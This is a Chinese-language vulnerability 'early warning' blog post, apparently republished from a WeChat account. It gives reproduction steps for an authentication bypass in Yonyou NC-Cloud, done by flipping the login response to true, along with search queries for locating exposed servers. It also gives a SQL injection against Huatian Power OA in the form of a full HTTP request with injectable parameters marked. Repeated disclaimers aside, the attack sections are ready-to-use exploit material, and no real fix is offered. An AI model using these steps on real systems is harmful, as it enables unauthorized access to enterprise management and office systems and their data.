0day漏洞预警-用友文件服务器认证绕过-华天动力oa SQL注入

天钧

发布于 2023-09-06 09:26:42

4730

发布于 2023-09-06 09:26:42

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、产品介绍

用友NC产品是面向集团企业的世界级高端管理软件，市场占有率在同类产品中已经达到亚太第一，已在8000家集团企业中应用，国内用户涵盖大多数关键基础设施运营单位。用友NC综合利用最新的互联网技术、云计算技术、移动应用技术等，通过构建大企业私有云来全面满足集团企业管理、全产业链管控和电子商务运营，

用友NC-Cloud是用友网络科技公司推出的一款面向中小企业的云服务产品。该产品整合了用友各类管理软件如ERP、CRM、OA等,实现了这些软件的云化部署。该漏洞利用难度低，可导致直接登陆后台，建议尽快修复。

漏洞复现

用友文件服务器认证绕过

资产搜索：
app="用友-NC-Cloud"   或者是app="用友-NC-Cloud" && server=="Apache-Coyote/1.1"

POST数据包修改返回包 false改成ture就可以绕过登陆
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Thu, 10 Aug 2023 20:38:25 GMT
Connection: close
Content-Length: 17

{"login":"false"}

二、产品介绍

华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台，在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。

漏洞复现

华天动力oa SQL注入

访问
http://xxxx//report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx
然后抓包
POST /report/reportServlet?action=8 HTTP/1.1
Host: xxxx
Content-Length: 145
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://xxx/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxxx/report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=D207AE96056400942620F09D34B8CDF3
Connection: close

year=*&userName=*&startDate=*&endDate=*&dutyRule=*&resultPage=%2FreportJsp%2FshowReport.jsp%3Fraq%3D%252FJourTemp2.raq&currTab=

(注：本文章为技术分享，禁止任何非授权攻击行为)

漏洞修复

厂商是否提供漏洞修补方案，建议用户联系相关厂商进行咨询

本文章为技术分享，禁止任何非授权攻击行为

本文章为技术分享，禁止任何非授权攻击行为本文章为技术分享，禁止任何非授权攻击行为本文章为技术分享，禁止任何非授权攻击行为本文章为技术分享，禁止任何非授权攻击行为

本文参与腾讯云自媒体分享计划，分享自微信公众号。

原始发表：2023-08-12，如有侵权请联系 cloudcommunity@tencent.com 删除

sql